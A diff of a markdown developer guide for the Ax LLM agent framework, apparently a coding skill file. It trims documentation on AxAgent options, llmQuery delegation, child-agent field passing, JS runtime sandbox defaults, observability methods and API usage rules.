- - Keep `executorOptions` focused on actor-only forward concerns such as `description`, `model`, `modelConfig`, `thinkingTokenBudget`, and `showThoughts`.
1192
- - Use `executorModelPolicy` when the actor is the bottleneck and you want the responder to stay fixed.
1193
-
1194
- ## Dynamic Output Truncation
1195
-
1196
- Runtime output truncation is **budget-proportional** and **type-aware**:
1197
-
1198
- **Budget-proportional sizing**: The effective truncation limit scales with remaining context budget. Early turns (empty action log) use the full `maxRuntimeChars` ceiling. As the action log fills toward `targetPromptChars`, the limit decays linearly down to 15% of the ceiling, hard-floored at 400 chars. This means early turns preserve more output detail while later turns conserve context for reasoning.
1199
-
1200
- **Type-aware serialization**: Non-string runtime output is serialized with structural awareness before the char-budget truncation pass:
1201
-
1202
- - **Large arrays** (>10 items): first 3 + last 2 items are kept; middle items replaced with `... [N hidden items]`.
1203
- - **Deep objects** (>3 levels): nested values beyond depth 3 replaced with `[Object]` or `[Array(N)]`.
1204
- - **Error stack traces**: first 3 + last 1 stack frames kept; middle frames replaced with `... [N frames hidden]`.
1205
- - **Simple values**: standard `JSON.stringify` passthrough.
1206
-
1207
- This means the actor sees structurally informative output even when the char budget is tight, rather than a blindly head-truncated string.
1208
439
 
1209
- Users do not need to configure this behavior — it is automatic. `maxRuntimeChars` sets the upper bound; the dynamic system only ever reduces, never exceeds it.
1210
-
1211
- ## Stage Prompt Controls
1212
-
1213
- The pipeline has three peer stage-config bags: `contextOptions` (distiller), `executorOptions` (executor), `responderOptions` (responder). Each accepts the same shape: `description`, `model`, `modelConfig`, `excludeFields`, plus other forward options.
1214
-
1215
- Key fields:
1216
-
1217
- - `contextOptions.description`: append extra distiller-specific instructions; useful for telling the distiller about domain conventions for narrowing context.
1218
- - `executorOptions.description`: append extra executor-specific instructions; the typical place for tool-use guidance.
1219
- - `responderOptions.description`: append extra responder-specific instructions; useful for output-formatting rules.
1220
- - `contextOptions.model` / `executorOptions.model` / `responderOptions.model`: split model choice across the three stages.
1221
- - `executorModelPolicy`: auto-switch only the executor when the run is on a consecutive error streak or discovery fetches land in specific namespaces.
1222
-
1223
- Good split-model pattern:
1224
-
1225
- ```typescript
1226
- const researchAgent = agent('query:string -> answer:string', {
1227
- contextFields: ['query'],
1228
- runtime,
1229
- contextPolicy: { preset: 'checkpointed', budget: 'balanced' },
1230
- executorOptions: {
1231
- model: 'gpt-5.4',
1232
- },
1233
- responderOptions: {
1234
- model: 'gpt-5.4-mini',
1235
- },
440
+ const analyst = agent('context:string, audience:string, query:string -> answer:string', {
441
+ functions: [writingCoach],
442
+ contextFields: ['context'],
1236
443
  });
1237
444
  ```
1238
445
 
1239
- Model guidance:
1240
-
1241
- - Put the stronger model on the actor when the task depends on multi-turn exploration, discovery, runtime state reuse, or compressed replay.
1242
- - Put the stronger model on the responder only when the hard part is final synthesis/formatting rather than exploration.
1243
- - For cost-sensitive setups, a common pattern is stronger actor + cheaper responder, not the other way around.
1244
- - Prefer `executorModelPolicy` over globally upgrading the whole agent when the actor only needs help after context grows or the run starts thrashing.
1245
- - Pair `contextPolicy: { preset: 'checkpointed', budget: 'balanced' }` with `executorModelPolicy` when you want full replay first and actor-only upgrades triggered by errors or discovered tool domains.
1246
-
1247
- Invalid pattern:
1248
-
1249
- ```javascript
1250
- const defs = await discoverFunctions(['kb.findSnippets']);
1251
- console.log(defs);
1252
- const snippets = await kb.findSnippets({ topic: 'severity' });
1253
- await final("Summarize severity findings", { snippets });
1254
- ```
1255
-
1256
- Reason: this mixes observation and follow-up work in one turn.
1257
-
1258
- ## Threading Parent Fields Into Child Agents
1259
-
1260
- If a child agent requires a parent field such as `audience`, declare it on the child's signature and pass it explicitly when calling the child from the actor:
1261
-
1262
- ```typescript
1263
- const writingCoach = agent(
1264
- 'draft:string, audience:string -> revision:string',
1265
- {
1266
- agentIdentity: {
1267
- name: 'Writing Coach',
1268
- description: 'Polishes summaries for a target audience',
1269
- namespace: 'team',
1270
- },
1271
- contextFields: [],
1272
- }
1273
- );
1274
-
1275
- const analyst = agent(
1276
- 'context:string, audience:string, query:string -> answer:string',
1277
- {
1278
- functions: [writingCoach],
1279
- contextFields: ['context'],
1280
- }
1281
- );
1282
- ```
1283
-
1284
- Generated runtime call (note: namespace comes from the child's `agentIdentity.namespace`; falls back to `utils` if unset):
446
+ Generated runtime call:
1285
447
 
1286
448
  ```javascript
1287
449
  const polished = await team.writingCoach({
@@ -1292,158 +454,29 @@ const polished = await team.writingCoach({
1292
454
 
1293
455
  Rules:
1294
456
 
1295
- - Pass parent fields explicitly via the call site — `inputs.<field>`.
457
+ - Pass parent fields explicitly via the call site.
1296
458
  - If many children need the same field on every call, use `inputUpdateCallback` to inject the value before each executor turn.
1297
- - Do not assume any auto-propagation: child agents receive only the args the actor passes.
459
+ - Do not assume auto-propagation; child agents receive only the args the actor passes.
1298
460
 
1299
- ## Grouped Function Modules
461
+ ## Core API Reference
1300
462
 
1301
- For discovery mode, you can group functions into modules using the `AxAgentFunctionGroup` shape — handy when you want a clean `kb.find(...)`, `metrics.score(...)` namespace tree without setting `namespace` on every individual `fn(...)`:
463
+ Factory shape:
1302
464
 
1303
465
  ```typescript
1304
- const parent = agent('query:string -> answer:string', {
1305
- functions: [
1306
- {
1307
- namespace: 'kb',
1308
- description: 'Knowledge base lookups',
1309
- functions: [findSnippetsFn, searchPagesFn],
1310
- },
1311
- {
1312
- namespace: 'metrics',
1313
- description: 'Scoring and coverage helpers',
1314
- functions: [scoreCoverageFn],
1315
- },
1316
- ],
1317
- functionDiscovery: true,
1318
- contextFields: [],
466
+ agent(signature, {
467
+ ai,
468
+ judgeAI,
469
+ agentIdentity,
470
+ contextFields,
471
+ functions,
472
+ functionDiscovery,
473
+ ...agentOptions,
1319
474
  });
1320
475
  ```
1321
476
 
1322
- Rules:
1323
-
1324
- - A group is `{ namespace, description, functions: [...] }`. The group's `namespace` and `description` show up in `discoverModules(...)` markdown.
1325
- - Mix groups and ungrouped entries freely in `functions: [...]` — child agents and `fn(...)` tools sit alongside group entries.
1326
- - There is no `local` / `shared` / `globallyShared` propagation. Each agent owns its own `functions: [...]`; pass shared tools to children explicitly.
1327
-
1328
- ## Tuning Hand-off
1329
-
1330
- When the user wants `agent.optimize(...)`, judge configuration, eval datasets, saved optimization artifacts, or recursive optimization guidance, use the `ax-agent-optimize` skill.
1331
-
1332
- Keep this skill focused on building and running agents. For tuning work:
1333
-
1334
- - use eval-safe tools or in-memory mocks
1335
- - treat `judgeOptions` as part of the optimize workflow
1336
- - choose a deterministic `metric` when scoring is objective; use the built-in judge only when run quality needs qualitative review
1337
- - keep runtime authoring guidance here and optimization guidance in `ax-agent-optimize`
1338
-
1339
- ## `llmQuery(...)` Rules
1340
-
1341
- Available forms:
1342
-
1343
- - `await llmQuery(query, context?)`
1344
- - `await llmQuery({ query, context? })`
1345
- - `await llmQuery([{ query, context }, ...])`
1346
-
1347
- Rules:
1348
-
1349
- - `llmQuery(...)` forwards only the explicit `context` argument.
1350
- - Parent inputs are not automatically available to `llmQuery(...)` children.
1351
- - In `mode: 'simple'`, `llmQuery(...)` is a direct semantic helper.
1352
- - In `mode: 'advanced'`, `llmQuery(...)` delegates a focused subtask to a child `AxAgent` with its own runtime and action log while recursion depth remains.
1353
- - In advanced mode, no parent `contextFields` are auto-inserted into recursive children. Only explicit `llmQuery(..., context)` payload is available there.
1354
- - If `context` is a plain object, safe keys are exposed as child runtime globals and the full payload is also available as `context`.
1355
- - In advanced mode, use `llmQuery(...)` to offload discovery-heavy, tool-heavy, or multi-turn semantic branches so the parent action log stays smaller and more focused.
1356
- - In advanced mode, use batched `llmQuery([...])` only for independent subtasks. Use serial calls when later work depends on earlier results.
1357
- - In advanced mode, a good pattern is: parent does coarse discovery and JS narrowing, child `llmQuery(...)` calls handle focused branch analysis, then parent merges child outputs and finishes.
1358
- - In advanced mode with `functions.discovery: true`, prefer putting noisy tool discovery, `discoverFunctions(...)`, and branch-specific tool chatter inside delegated child calls when those branches are independent or semantically distinct.
1359
- - In advanced mode, pass compact named object context to children instead of huge raw parent payloads. This makes the delegated prompt easier to follow and gives the child useful top-level globals.
1360
- - In advanced mode, do not assume child-created variables, discovered docs, or action-log history come back to the parent. Only the child return value comes back.
1361
- - In advanced mode, if a child calls `askClarification(...)`, that clarification bubbles up and ends the top-level run.
1362
- - In advanced mode, recursion is depth-limited: `maxDepth: 0` makes top-level `llmQuery(...)` simple, `maxDepth: 1` makes top-level `llmQuery(...)` advanced and child `llmQuery(...)` simple.
1363
- - In advanced mode, batched delegated children are cancelled when a sibling child asks for clarification or aborts, so use batched form only when those branches are truly independent.
1364
- - `maxSubAgentCalls` is a shared budget across the whole top-level run, including recursive children.
1365
- - Single-call `llmQuery(...)` may return `[ERROR] ...` on non-abort failures.
1366
- - Batched `llmQuery([...])` returns per-item `[ERROR] ...`.
1367
- - If a result starts with `[ERROR]`, inspect or branch on it instead of assuming success.
1368
-
1369
- Minimal example:
1370
-
1371
- ```javascript
1372
- const summary = await llmQuery('Summarize this incident', inputs.context);
1373
- if (summary.startsWith('[ERROR]')) {
1374
- console.log(summary);
1375
- } else {
1376
- console.log(summary);
1377
- }
1378
- ```
1379
-
1380
- Advanced recursive discovery example:
1381
-
1382
- ```javascript
1383
- const narrowedIncidents = incidents.map((incident) => ({
1384
- id: incident.id,
1385
- timeline: incident.timeline,
1386
- notes: incident.notes.slice(0, 1200),
1387
- }));
1388
-
1389
- const [severityReview, followupReview] = await llmQuery([
1390
- {
1391
- query:
1392
- 'Use discovery and available tools to review severity policy alignment. Return compact findings.',
1393
- context: {
1394
- incidents: narrowedIncidents,
1395
- rubric: 'severity-policy',
1396
- },
1397
- },
1398
- {
1399
- query:
1400
- 'Use discovery and available tools to review postmortem and follow-up obligations. Return compact findings.',
1401
- context: {
1402
- incidents: narrowedIncidents,
1403
- rubric: 'postmortem-followup',
1404
- },
1405
- },
1406
- ]);
1407
-
1408
- const merged = await llmQuery(
1409
- 'Merge these delegated reviews into one manager-ready summary with next steps.',
1410
- {
1411
- severityReview,
1412
- followupReview,
1413
- audience: inputs.audience,
1414
- }
1415
- );
1416
- ```
1417
-
1418
- Delegation decision guide:
1419
-
1420
- - **JS-only** — deterministic logic (filter, sort, count, regex, date math) → do it inline, don't delegate.
1421
- - **Single-shot semantic** — needs LLM reasoning but no tools or multi-step exploration → single `llmQuery` with narrow context.
1422
- - **Full delegation** — needs its own discovery, tool calls, or >2 turns of exploratory work → `llmQuery` as child agent.
1423
- - **Parallel fan-out** — 2+ independent subtasks each qualifying for delegation → batched `llmQuery([...])`.
1424
-
1425
- Context handling:
1426
-
1427
- - In advanced mode, the `context` object is injected into the child's JS runtime as named globals — it does NOT go into the child's LLM prompt. The child's prompt sees only a compact metadata summary (types, sizes, element keys) of the delegated context.
1428
- - The child actor explores the delegated context with code, the same way the parent explores `inputs.*`.
1429
- - Always narrow with JS before delegating — never pass raw `inputs.*`. Name context keys semantically (e.g. `{ emails: filtered, rubric: 'classify-urgency' }`).
1430
- - Estimate total sub-agent calls before fanning out. `maxSubAgentCalls` is a shared budget across all recursion levels.
1431
-
1432
- Divide-and-conquer patterns:
1433
-
1434
- - **Fan-Out / Fan-In**: JS narrows into categories → `llmQuery([...])` fans out per category → JS or one more `llmQuery` merges results.
1435
- - **Pipeline**: serial `llmQuery` calls where each depends on the prior result.
1436
- - **Scout-then-Execute**: first child explores (e.g. check availability) → parent processes with JS → second child acts (e.g. draft invite).
1437
-
1438
- Notes:
1439
-
1440
- - Use these patterns when one task naturally splits into focused semantic branches with their own discovery or tool usage.
1441
- - Keep the parent responsible for orchestration, cheap JS narrowing, and final assembly.
1442
- - See `src/examples/rlm-discovery.ts` for the full recursive discovery demo.
1443
-
1444
- ## Short API Reference
1445
-
1446
- ### `agentIdentity`
477
+ - `ai` is an optional default service for the agent instance; `.forward(ai, ...)` can still pass the runtime service.
478
+ - `judgeAI` is the optional default judge/teacher service used by optimize flows.
479
+ - `agentIdentity` controls the user-facing agent identity and child-agent function metadata.
1447
480
 
1448
481
  ```typescript
1449
482
  agentIdentity?: {
@@ -1454,243 +487,65 @@ agentIdentity?: {
1454
487
  ```
1455
488
 
1456
489
  - `name` is normalized to camelCase for child-agent function names.
1457
- - `name` and `description` are included in the Actor and Responder prompts as the user-facing agent identity.
1458
- - `namespace` changes the child-agent module from default `agents` to a custom module such as `team`.
1459
-
1460
- ### `AxAgentOptions`
490
+ - `name` and `description` are included in the actor and responder prompts as the user-facing agent identity.
491
+ - `namespace` changes the child-agent module from default `utils` to a custom module such as `team`.
1461
492
 
1462
493
  Each `contextFields` entry is either a plain field name string or an object controlling how much of the value is inlined into the distiller prompt:
1463
494
 
1464
- - `{ field, promptMaxChars: N }` — **threshold inline**: inlined only when the value's serialized size N chars; omitted entirely (runtime-only) when larger. Works with any value type.
1465
- - `{ field, keepInPromptChars: N, reverseTruncate?: boolean }` — **guaranteed excerpt**: always inlined, truncated to N chars with a `...[truncated M chars]` marker. `reverseTruncate: true` keeps the *last* N chars instead of the first. Requires a string value.
1466
-
1467
- Use `promptMaxChars` when partial data is worse than no data (e.g. JSON objects). Use `keepInPromptChars` when a prefix or suffix alone is useful (e.g. a document header, or a log tail with `reverseTruncate: true`). The two options are mutually exclusive on a single field.
495
+ - `{ field, promptMaxChars: N }`: inline only when the serialized value is at most `N` chars; otherwise omit it from the prompt and keep it runtime-only.
496
+ - `{ field, keepInPromptChars: N, reverseTruncate?: boolean }`: always inline a truncated string excerpt; `reverseTruncate: true` keeps the last `N` chars.
1468
497
 
1469
- ```typescript
1470
- {
1471
- contextFields: readonly (
1472
- | string
1473
- | { field: string; promptMaxChars?: number }
1474
- | { field: string; keepInPromptChars: number; reverseTruncate?: boolean }
1475
- )[];
1476
-
1477
- agents?: {
1478
- local?: AxAnyAgentic[];
1479
- shared?: AxAnyAgentic[];
1480
- globallyShared?: AxAnyAgentic[];
1481
- excluded?: string[];
1482
- };
1483
-
1484
- fields?: {
1485
- local?: string[];
1486
- shared?: string[];
1487
- globallyShared?: string[];
1488
- excluded?: string[];
1489
- };
1490
-
1491
- functions?: {
1492
- local?: AxFunction[];
1493
- shared?: AxFunction[];
1494
- globallyShared?: AxFunction[];
1495
- excluded?: string[];
1496
- discovery?: boolean;
1497
- };
1498
-
1499
- runtime?: AxCodeRuntime;
1500
- promptLevel?: 'default' | 'detailed';
1501
- maxSubAgentCalls?: number; // global cap (default: 100)
1502
- maxBatchedLlmQueryConcurrency?: number;
1503
- maxTurns?: number;
1504
- maxRuntimeChars?: number;
1505
- contextPolicy?: AxContextPolicyConfig;
1506
- summarizerOptions?: Omit<AxProgramForwardOptions<string>, 'functions'>;
1507
- executorTurnCallback?: (turn: {
1508
- turn: number;
1509
- actionLogEntryCount: number;
1510
- guidanceLogEntryCount: number;
1511
- executorResult: Record<string, unknown>;
1512
- code: string;
1513
- result: unknown;
1514
- output: string;
1515
- isError: boolean;
1516
- thought?: string;
1517
- }) => void | Promise<void>;
1518
- onContextEvent?: (event: AxAgentContextEvent) => void | Promise<void>;
1519
- inputUpdateCallback?: (currentInputs: Record<string, unknown>) => Promise<Record<string, unknown> | undefined> | Record<string, unknown> | undefined;
1520
- onFunctionCall?: (call: {
1521
- name: string;
1522
- qualifiedName: string;
1523
- args: Record<string, unknown>;
1524
- kind: 'internal' | 'external';
1525
- }) => void | Promise<void>;
1526
- onMemoriesSearch?: AxAgentMemoriesSearchFn; // (searches: readonly string[]) => readonly AxAgentMemoryResult[] | Promise<...>
1527
- onUsedMemories?: (results: readonly AxAgentMemoryResult[]) => void | Promise<void>;
1528
- onSkillsSearch?: AxAgentSkillsSearchFn; // (searches: readonly string[]) => readonly AxAgentSkillResult[] | Promise<...>
1529
- onUsedSkills?: (results: readonly AxAgentSkillResult[]) => void | Promise<void>;
1530
- skills?: readonly AxAgentSkillResult[]; // preload skills at construction; also accepted at forward()-time (executor stage only)
1531
- mode?: 'simple' | 'advanced';
1532
- executorModelPolicy?: readonly [
1533
- | {
1534
- model: string;
1535
- aboveErrorTurns: number;
1536
- namespaces?: string[];
1537
- }
1538
- | {
1539
- model: string;
1540
- aboveErrorTurns?: number;
1541
- namespaces: string[];
1542
- },
1543
- ...Array<
1544
- | {
1545
- model: string;
1546
- aboveErrorTurns: number;
1547
- namespaces?: string[];
1548
- }
1549
- | {
1550
- model: string;
1551
- aboveErrorTurns?: number;
1552
- namespaces: string[];
1553
- }
1554
- >,
1555
- ];
1556
- recursionOptions?: Partial<Omit<AxProgramForwardOptions, 'functions'>> & {
1557
- maxDepth?: number;
1558
- };
1559
- contextOptions?: AxStageOptions;
1560
- executorOptions?: AxStageOptions;
1561
- responderOptions?: AxStageOptions;
1562
- judgeOptions?: Partial<AxJudgeOptions>;
1563
- bubbleErrors?: ReadonlyArray<new (...args: any[]) => Error>;
1564
- }
1565
- ```
498
+ Use `promptMaxChars` when partial data is worse than no data. Use `keepInPromptChars` when a prefix or suffix alone is useful. The two options are mutually exclusive on one field.
1566
499
 
1567
- - `executorTurnCallback` fires for the root agent and for recursive child agents that run actor turns.
1568
- - `executorModelPolicy` applies to the actor loop and can be inherited by recursive child agents unless you override it there.
1569
- - `namespaces` matches exact discovery namespaces from successful `discoverFunctions(...)` lookups and starts affecting model choice on the next actor turn.
1570
- - Consecutive error turns reset after a successful non-error turn and when checkpoint summarization refreshes to a new fingerprint.
1571
- - `maxSubAgentCalls` is a shared delegated-call budget across the entire run.
500
+ ## Public Surface
1572
501
 
1573
- ### `AxJSRuntime` options (cross-reference)
502
+ Use these method groups as the compact AxAgent surface map:
1574
503
 
1575
- Constructor options for `new AxJSRuntime(opts)`. All defaults are secure — see `## AxJSRuntime Security` for full detail and recipes.
504
+ - Running: `forward(ai, values, options?)` and `streamingForward(ai, values, options?)`.
505
+ - Forward-time agent options: `skills`, `onUsedMemories`, and `onUsedSkills`; use `ax-agent-memory-skills` for details.
506
+ - State and control: `getState()`, `setState(state?)`, `stop()`, `getSignature()`, `setSignature(signature)`, `getFunction()`, `getId()`, and `setId(id)`.
507
+ - Observability: `getChatLog()`, `getUsage()`, `getStagedUsage()`, `resetUsage()`, and `getTraces()`; use `ax-agent-observability` for details.
508
+ - Demos and tuning: `setDemos(...)`, `namedPrograms()`, `namedProgramInstances()`, `optimize(...)`, `applyOptimization(...)`, `getOptimizableComponents()`, and `applyOptimizedComponents(...)`; use `ax-agent-optimize` for tuning details.
1576
509
 
1577
- - `permissions?: readonly AxJSRuntimePermission[]` — default `[]`; opt in capabilities (NETWORK, FILESYSTEM, CHILD_PROCESS, WORKERS, STORAGE, CODE_LOADING, COMMUNICATION, TIMING).
1578
- - `blockDynamicImport?: boolean` — default `true`.
1579
- - `allowedModules?: readonly string[]` — default `[]`.
1580
- - `freezeIntrinsics?: boolean` — default `true`.
1581
- - `blockShadowRealm?: boolean` — default `true`.
1582
- - `lockWorkerIPC?: boolean` — default `true`.
1583
- - `preventGlobalThisExtensions?: boolean` — default `false` (opt-in; breaks persistence).
1584
- - `useNodePermissionModel?: boolean | 'auto'` — default `'auto'`.
1585
- - `nodePermissionAllowlist?: { fsRead?; fsWrite?; childProcess?; addons?; wasi? }`.
1586
- - `resourceLimits?: { maxOldGenerationSizeMb?; maxYoungGenerationSizeMb?; codeRangeSizeMb?; stackSizeMb? }`.
1587
- - `allowDenoRemoteImport?: boolean` — default `false`.
1588
- - `allowUnsafeNodeHostAccess?: boolean` — default `false`.
1589
-
1590
- ## Observability: getChatLog() and getUsage()
1591
-
1592
- `AxAgent` exposes actor and responder sub-programs. `getChatLog()` returns the same flat `AxChatLogEntry[]` shape as `AxGen` and `AxFlow`; use each entry's optional `name` field to distinguish `distiller`, `executor`, and `responder`. `getUsage()` still returns token usage split by actor/responder.
1593
-
1594
- ### getChatLog()
1595
-
1596
- Returns the full normalized chat history after any `.forward()` call. Each entry is one `ai.chat()` round-trip. Actor stages accumulate one entry per turn; the responder typically has one entry.
1597
-
1598
- ```typescript
1599
- const log = myAgent.getChatLog();
1600
- // readonly AxChatLogEntry[]
1601
-
1602
- for (const entry of log) {
1603
- console.log(entry.name, entry.model);
1604
- for (const msg of entry.messages) {
1605
- console.log(`[${msg.role}]`, msg.content);
1606
- }
1607
- }
1608
- ```
1609
-
1610
- Each `AxChatLogEntry` captures the full prompt sent to the model and its response:
1611
-
1612
- ```typescript
1613
- type AxChatLogMessage =
1614
- | { role: 'system'; content: string } // system prompt (includes <tools> block when functions present)
1615
- | { role: 'user'; content: string }
1616
- | { role: 'assistant'; content: string } // may contain <think>...</think> and <tool_call>{...}</tool_call>
1617
- | { role: 'tool'; name: string; content: string };
1618
-
1619
- type AxChatLogEntry = {
1620
- name?: string; // e.g. "distiller", "executor", "responder"
1621
- model: string;
1622
- messages: AxChatLogMessage[];
1623
- modelUsage?: AxProgramUsage;
1624
- stage?: 'ctx' | 'task';
1625
- };
1626
- ```
1627
-
1628
- ### getUsage()
1629
-
1630
- Returns token usage split by actor/responder. Each sub-array contains one `AxProgramUsage` entry per model/run, merged by `(ai, model)` key.
1631
-
1632
- ```typescript
1633
- const usage = myAgent.getUsage();
1634
- // { actor: AxProgramUsage[], responder: AxProgramUsage[] }
1635
-
1636
- console.log('Actor tokens:', usage.actor[0]?.tokens);
1637
- console.log('Responder tokens:', usage.responder[0]?.tokens);
1638
- ```
510
+ Rules:
1639
511
 
1640
- ### resetUsage()
512
+ - `getFunction()` requires `agentIdentity` because the agent needs function metadata when used as a child tool.
513
+ - Prefer `.forward(...)` for normal runs and `.streamingForward(...)` only when the caller needs streamed responder output.
514
+ - `setSignature(...)` must preserve configured `contextFields`; it throws if a configured context field is missing from the new signature.
515
+ - Treat low-level optimization component methods as advanced hooks; normal examples should use `agent.optimize(...)` and `agent.applyOptimization(...)`.
1641
516
 
1642
- Resets both actor and responder usage at once:
517
+ ## Tuning Hand-off
1643
518
 
1644
- ```typescript
1645
- myAgent.resetUsage();
1646
- ```
519
+ When the user wants `agent.optimize(...)`, judge configuration, eval datasets, saved optimization artifacts, or recursive optimization guidance, use `ax-agent-optimize`.
1647
520
 
1648
- ### Type signatures
521
+ Keep this skill focused on building and running agents. For tuning work:
1649
522
 
1650
- ```typescript
1651
- // AxAgent
1652
- agent.getChatLog(): readonly AxChatLogEntry[]
1653
- agent.getUsage(): { actor: AxProgramUsage[]; responder: AxProgramUsage[] }
1654
- agent.resetUsage(): void
1655
-
1656
- // AxGen / AxFlow
1657
- gen.getChatLog(): readonly AxChatLogEntry[]
1658
- gen.getUsage(): AxProgramUsage[]
1659
- ```
523
+ - use eval-safe tools or in-memory mocks
524
+ - treat `judgeOptions` as part of the optimize workflow
525
+ - choose a deterministic `metric` when scoring is objective; use the built-in judge only when run quality needs qualitative review
526
+ - keep runtime authoring guidance here and optimization guidance in `ax-agent-optimize`
1660
527
 
1661
528
  ## Examples
1662
529
 
1663
530
  Fetch these for full working code:
1664
531
 
1665
- - [Agent](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/agent.ts) basic agent
1666
- - [Functions](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/function.ts) function validation
1667
- - [Food Search](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/food-search.ts) API tools
1668
- - [Smart Home](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/smart-home.ts) state management
1669
- - [RLM](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm.ts) RLM basic
1670
- - [RLM Long Task](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-long-task.ts) RLM context policy
1671
- - [RLM Discovery](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-discovery.ts) — advanced recursive `llmQuery` plus discovery-heavy delegated subtasks
1672
- - [RLM Shared Fields](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-shared-fields.ts) shared fields
1673
- - [RLM Adaptive Replay](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-adaptive-replay.ts) — adaptive replay
1674
- - [RLM Live Runtime State](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-live-runtime-state.ts) — structured runtime-state rendering
1675
- - [RLM Clarification Resume](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-clarification-resume.ts) — clarification exception plus `getState()` / `setState(...)`
1676
- - [RLM Memories and Skills](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/rlm-memories-and-skills.ts) — `onMemoriesSearch` + `recall()` and `onSkillsSearch` + `consult()` with observability via `onUsedMemories` / `onUsedSkills`
1677
- - [Customer Support](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/customer-support.ts) — classification agent
1678
- - [Abort Patterns](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/abort-patterns.ts) — abort handling
532
+ - [Agent](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/agent.ts) - basic agent
533
+ - [Functions](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/function.ts) - function validation
534
+ - [Food Search](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/food-search.ts) - API tools
535
+ - [Smart Home](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/smart-home.ts) - state management
536
+ - [Customer Support](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/customer-support.ts) - classification agent
537
+ - [Abort Patterns](https://raw.githubusercontent.com/ax-llm/ax/refs/heads/main/src/examples/abort-patterns.ts) - abort handling
538
+
539
+ RLM examples are listed in `ax-agent-rlm`. Memory/skills examples are listed in `ax-agent-memory-skills`.
1679
540
 
1680
541
  ## Do Not Generate
1681
542
 
1682
543
  - Do not use `new AxAgent(...)` for new code unless explicitly required.
1683
544
  - Do not assume child agents are always under `agents.*`.
1684
545
  - Do not guess function names in discovery mode.
1685
- - Do not write a full multi-step RLM actor program in one turn.
546
+ - Do not write a full multi-step RLM actor program in one turn; use `ax-agent-rlm`.
1686
547
  - Do not combine `console.log(...)` with `final(...)`.
1687
- - Do not forget `fields.shared` when child agents depend on parent inputs.
1688
- - Do not add `bubbleErrors` for ordinary recoverable tool errors; those should stay as `[ERROR]` strings so the actor can handle them.
1689
- - Do not call `recall()` from the responder stage it is only available in distiller and executor.
1690
- - Do not assign the result of `await recall(...)` or `await consult(...)` — both return `void`. Read `inputs.memories` next turn (or the **Loaded Skills** section for `consult`) to see what landed.
1691
- - Do not loop `recall()` calls or wrap them in `Promise.all` — the runtime rejects that as a policy violation. Pass all queries in one array to a single `await recall([...])`.
1692
- - Do not assume child agents inherit `onMemoriesSearch` or `onSkillsSearch` — set each one explicitly on each agent that needs `recall()` / `consult()`.
1693
- - Do not call `consult()` from the distiller or responder stages — it is only available in the executor.
1694
- - Do not loop `consult()` calls or wrap them in `Promise.all` — same policy as `recall()`. Pass all queries in one array.
1695
- - Do not pass `onMemoriesSearch` results via `fields.shared` as a workaround — use the built-in `recall()` primitive instead.
1696
- - Do not assume `inputs.memories` persists across `.forward()` calls — its lifetime is one run. Persist memories in your store and recall them again on subsequent calls.
548
+ - Do not add `bubbleErrors` for ordinary recoverable tool errors.
549
+ - Do not call `discover()` from the distiller or responder stages.
550
+ - Do not assign or inspect the return value of `await discover(...)`; read the next prompt instead.
551
+ - Do not loop `discover()` calls or wrap them in `Promise.all`.